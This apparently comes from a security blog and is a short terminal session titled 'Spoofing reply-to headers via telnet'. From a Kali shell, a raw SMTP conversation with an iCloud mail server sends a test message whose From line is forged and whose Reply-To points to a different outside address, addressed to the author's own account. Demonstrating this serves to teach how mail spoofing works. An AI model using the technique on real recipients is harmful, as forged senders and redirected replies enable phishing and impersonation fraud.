Spoofing reply-to headers via telnet


root@kali:~# telnet mx1.mail.icloud.com 25
Connected to mx1.mail.icloud.com.
Escape character is ‘^]’.
220 nk11p00mm-smtpin001.mac.com — Server ESMTP (Oracle Communications Messaging Server 64bit (built Sep 8 2015))
helo whatever.com
250 nk11p00mm-smtpin001.mac.com OK, 50-197-245-29-static.hfc.comcastbusiness.net [].
mail from:bob@icloud.com
250 2.5.0 Address Ok.
rcpt to:nickvangilder@icloud.com
250 2.1.5 nickvangilder@icloud.com OK.
354 Enter mail, end with a single “.”.
To:Nick VanGilder<nickvangilder@icloud.com>
From:Bob Dole<bob@icloud.com>
Reply-To:Bob Dole<nickvangilder@outlook.com>

This is a test
250 2.5.0 Ok.


